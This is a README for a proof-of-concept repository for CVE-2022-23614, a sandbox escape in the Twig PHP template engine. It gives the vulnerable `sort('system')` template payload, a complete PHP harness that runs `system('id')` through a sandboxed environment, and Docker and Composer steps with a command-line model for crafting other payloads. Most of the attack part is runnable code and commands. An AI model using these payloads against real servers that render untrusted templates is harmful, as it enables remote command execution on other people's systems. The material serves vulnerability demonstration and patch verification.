Proof of concept (PoC) for CVE-2022-23614 referenced in the DSA-5107-1.
- CVSS-2.0: 7.5
- CVSS-3.X: 9.8
Twig is a flexible, fast, and secure template engine for PHP. Notably, filters can be applied inside a template before it is rendered. The `sort` filter sorts the elements of an array, and since Twig 2.12 it accepts an optional `arrow` parameter: a comparison callable that, in template syntax, is written as an arrow function (the original README wrote this example as `sort('desc')`, which is not a valid arrow):

```twig
{{ [5,8,2,3]|sort((a, b) => b <=> a) }}
```
Twig has a sandbox mode to evaluate untrusted template code. In sandbox mode, the `arrow` parameter of the `sort` filter must be a closure; otherwise an attacker could name any PHP function as the comparator and have it called with the array elements as arguments. In affected versions this constraint was not enforced: the string passed as the arrow was handed straight to PHP's `uasort()`, so the following template calls `system('id', '')` even though `system` is not among the functions allowed by the sandbox policy, which only inspects the names of the filters and functions used in the template.

```twig
{{ ["id",""]|sort('system') }}
```
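To see the sandbox boundary being crossed independently of the repository's `index.php`, here is an added standalone harness (not part of this repository and not Twig's own code). It assumes `twig/twig` 2.14.x installed with Composer in the current directory, and a Unix host where `id` exists. It installs a `SecurityPolicy` that allows only the `sort` and `join` filters and no functions at all, then renders a legitimate arrow-function template next to the attacker's template through the same sandboxed `Environment`:

```php
<?php
// Added example harness (not the repository's index.php, not Twig code).
// Assumes: composer require twig/twig:^2.14 in this directory.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityPolicy;

// Deliberately strict policy: no tags, no functions, no methods or properties,
// and only two filters. Note that 'system' is NOT in the allowed functions.
$policy = new SecurityPolicy(
    [],               // allowed tags
    ['sort', 'join'], // allowed filters
    [],               // allowed methods (class => [methods])
    [],               // allowed properties (class => [properties])
    []                // allowed functions
);

$templates = [
    // Benign use of the arrow parameter: a Twig arrow function compiles to a PHP
    // Closure, the only kind of callable the sandbox is meant to accept here.
    'legit'     => "{{ args|sort((a, b) => b - a)|join(',') }}",
    // Attacker-controlled template: the arrow is a plain string naming a PHP
    // function. The policy only checks the filter name ('sort', allowed), so this
    // compiles; the vulnerable filter then passes 'system' straight to uasort().
    'untrusted' => "{{ args|sort('system') }}",
];

$twig = new Environment(new ArrayLoader($templates), ['autoescape' => false]);
// Second constructor argument = true: every template rendered by this
// Environment runs in sandbox mode.
$twig->addExtension(new SandboxExtension($policy, true));

/**
 * Render a template under the sandbox and report what happened instead of dying.
 * On vulnerable twig/twig (< 2.14.11 / < 3.3.8) the 'untrusted' template executes
 * system('id', '') as the sort comparator and the command output goes to stdout.
 * On patched releases the sort filter refuses a non-Closure arrow in sandbox mode
 * and throws a Twig runtime error, which lands in the catch below.
 */
function renderSandboxed(Environment $twig, string $name, array $vars): string
{
    try {
        return $twig->render($name, $vars);
    } catch (\Throwable $e) {
        return 'blocked: ' . get_class($e) . ': ' . $e->getMessage();
    }
}

echo 'legit    : ', renderSandboxed($twig, 'legit', ['args' => [5, 8, 2, 3]]), PHP_EOL;
echo 'untrusted: ', renderSandboxed($twig, 'untrusted', ['args' => ['id', '']]), PHP_EOL;
```

Run it with `php harness.php` (the file name is arbitrary). Using exactly two elements in `args` means `uasort()` invokes the comparator once, with the first element as the command string and the second as the following argument, which is why the PoC payloads on this page use a two-element array whose second entry is an empty string.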
This PoC illustrates the vulnerability in two different set-ups: the Debian `php-twig` (v2.14.1) package, or the Composer `twig/twig` (v2.14) module.
The `index.php` file crafts a Twig template based on the first argument. In the following code, `argv[1]` is the name of the sorting function that Twig will call when rendering.

```php
// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";
```
Then `index.php` uses two deprecated Twig functions to load the generated template. Finally, it uses the second argument (`argv[2]`, a JSON object) to pass data to the template as it is rendered, notably the `args` array that we want to sort.

```php
// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);
```
The rendered template is then printed in the standard output.
Please note this repository was made for demonstration purposes only. It is meant to be simple to understand and easy to use in order to play with the CVE using only a command line interface. It is quite far from what one can find on an actual vulnerable server.
Using Docker, you can recreate the context of the original Debian Security Advisory (DSA). Use the provided `build-docker.sh` script to build and run the vulnerable container:

```sh
chmod a+x build-docker.sh
./build-docker.sh
```
The container shuts down once the payload (an `id` command) has executed. If you want to try your own commands, run the container in interactive mode:

```sh
docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash
```

Once in the container, craft your own payload following this model:

```sh
php index.php system '{"args":["id",""]}'
              ^      ^
              |      array to sort (JSON object)
              sorting function
```
This dockerfile was partially created using DECRET.
If you have PHP and Composer already installed on your machine, you can replicate the exploit using the vulnerable Composer module:

```sh
cd exploit
composer install
```

Then you just have to play with the payload:

```sh
php index.php system '{"args":["id",""]}'
```
CVE details: https://nvd.nist.gov/vuln/detail/CVE-2022-23614
DSA: https://www.debian.org/security/2022/dsa-5107
Patch commit: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9
PoC by davwwwx (using GUI): https://github.com/davwwwx/CVE-2022-23614